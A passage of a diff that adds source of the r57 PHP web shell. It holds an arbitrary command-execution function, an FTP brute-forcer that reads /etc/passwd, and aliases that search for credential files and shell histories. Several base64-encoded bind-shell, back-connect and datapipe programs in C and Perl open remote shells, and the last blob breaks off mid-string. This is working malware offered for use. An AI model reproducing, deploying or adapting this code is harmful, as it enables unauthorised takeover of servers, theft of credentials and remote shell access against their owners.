+'eng_butt10'=>'Save',
+'eng_text44'=>'Can\'t edit file! Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
+'eng_butt11'=>'Edit file',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_butt12'=>'Find',
+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_butt13'=>'Create/Delete',
+'eng_text61'=>'File created',
+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files via find',
+'eng_text80'=>'Type',
+'eng_text81'=>'Net',
+'eng_text82'=>'Databases',
+'eng_text83'=>'Run SQL query',
+'eng_text84'=>'SQL query',
+'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
+'eng_text86'=>'Download files from server',
+'eng_butt14'=>'Download',
+'eng_text87'=>'Download files from remote ftp-server',
+'eng_text88'=>'FTP-server:port',
+'eng_text89'=>'File on ftp',
+'eng_text90'=>'Transfer mode',
+'eng_text91'=>'Archivation',
+'eng_text92'=>'without archivation',
+'eng_text93'=>'FTP',
+'eng_text94'=>'FTP-bruteforce',
+'eng_text95'=>'Users list',
+'eng_text96'=>'Can\'t get users list',
+'eng_text97'=>'checked: ',
+'eng_text98'=>'success: ',
+'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
+'eng_text100'=>'Send file to remote ftp server',
+'eng_text101'=>'Use reverse (user -> resu) login for password',
+'eng_text102'=>'Mail',
+'eng_text103'=>'Send email',
+'eng_text104'=>'Send file to email',
+'eng_text105'=>'To',
+'eng_text106'=>'From',
+'eng_text107'=>'Subj',
+'eng_butt15'=>'Send',
+'eng_text108'=>'Mail',
+'eng_text109'=>'Hide',
+'eng_text110'=>'Show',
+'eng_text111'=>'SQL-Server : Port',
+'eng_text112'=>'Test bypass safe_mode with function mb_send_mail',
+'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list',
+'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body',
+'eng_text777'=>'bypass safemode with copy()',
+'eng_text888'=>'File name',
+'eng_text7777'=>'bypass safemode with curl()',
+'eng_text8888'=>'File name',
+'eng_text999'=>'bypass safemode with imap()',
+'eng_text9999'=>'File name',
+'eng_text1010'=>'bypass safemode with id()',
+'eng_text101010'=>'',
+);
+/*
+Àëèàñû êîìàíä
+Ãîçâîëÿþò èçáåæàòü ìíîãîêðàòíîãî íàáîðà îäíèõ è òåõ-æå êîìàíä. ( Ñäåëàíî áëàãîäàðÿ ìîåé ïðèðîäíîé ëåíè )
+Âû ìîæåòå ñàìè äîáàâëÿòü èëè èçìåíÿòü êîìàíäû.
+*/
+$aliases=array(
+'find suid files'=>'find / -type f -perm -04000 -ls',
+'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
+'find sgid files'=>'find / -type f -perm -02000 -ls',
+'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
+'find config.inc.php files'=>'find / -type f -name config.inc.php',
+'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
+'find config* files'=>'find / -type f -name "config*"',
+'find config* files in current dir'=>'find . -type f -name "config*"',
+'find all writable files'=>'find / -type f -perm -2 -ls',
+'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
+'find all writable directories'=>'find /  -type d -perm -2 -ls',
+'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
+'find all writable directories and files'=>'find / -perm -2 -ls',
+'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
+'find all service.pwd files'=>'find / -type f -name service.pwd',
+'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
+'find all .htpasswd files'=>'find / -type f -name .htpasswd',
+'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
+'find all .bash_history files'=>'find / -type f -name .bash_history',
+'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
+'find all .mysql_history files'=>'find / -type f -name .mysql_history',
+'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
+'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
+'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
+'list file attributes on a Linux second extended file system'=>'lsattr -va',
+'show opened ports'=>'netstat -an | grep -i listen',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=Wingdings color=gray>è</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=Verdana size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if(isset($_GET['users']))
+ {
+ if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
+ else
+  {
+  echo '<center>';
+  foreach($users as $user) { echo $user."<br>"; }
+  echo '</center>';
+  }
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+$windows = 0;
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
+if(empty($dir))
+ {
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); }
+ if(empty($os)){ $os ="-"; $unix=1; }
+ else
+    {
+    if(@eregi("^win",$os)) { $windows = 1; }
+    else { $unix = 1; }
+    }
+ }
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
+        $r .= ($windows)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+  die();
+  }
+if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+function get_users()
+{
+  $users = array();
+  $rows=file('/etc/passwd');
+  if(!$rows) return 0;
+  foreach ($rows as $string)
+   {
+           $user = @explode(":",$string);
+           if(substr($string,0,1)!='#') array_push($users,$user[0]);
+   }
+  return $users;
+}
+function we($i)
+{
+if($GLOBALS['language']=="ru"){ $text = 'Ãøèáêà! ÃÃ¥ ìîãó çàïèñàòü â ôàéë '; }
+else { $text = "[-] ERROR! Can't write in file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function re($i)
+{
+if($GLOBALS['language']=="ru"){ $text = 'Ãøèáêà! ÃÃ¥ ìîãó ïðî÷èòàòü ôàéë '; }
+else { $text = "[-] ERROR! Can't read file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function ce($i)
+{
+if($GLOBALS['language']=="ru"){ $text = "ÃÃ¥ óäàëîñü ñîçäàòü "; }
+else { $text = "Can't create "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function fe($l,$n)
+{
+$text['ru']  = array('ÃÃ¥ óäàëîñü ïîäêëþ÷èòüñÿ ê ftp ñåðâåðó','Ãøèáêà àâòîðèçàöèè íà ftp ñåðâåðå','ÃÃ¥ óäàëîñü ïîìåíÿòü äèðåêòîðèþ íà ftp ñåðâåðå');
+$text['eng'] = array('Connect to ftp server failed','Login to ftp server failed','Can\'t change dir on ftp server');
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>";
+return null;
+}
+function mr($l,$n)
+{
+$text['ru']  = array('ÃÃ¥ óäàëîñü îòïðàâèòü ïèñüìî','Ãèñüìî îòïðàâëåíî');
+$text['eng'] = array('Can\'t send mail','Mail sent');
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>";
+return null;
+}
+function perms($mode)
+{
+if ($GLOBALS['windows']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\">";
+ return $ret;
+}
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or we($fname);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          $aa = '';
+          if(($count = @preg_match_all($pattern,$CurString,$aa)))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
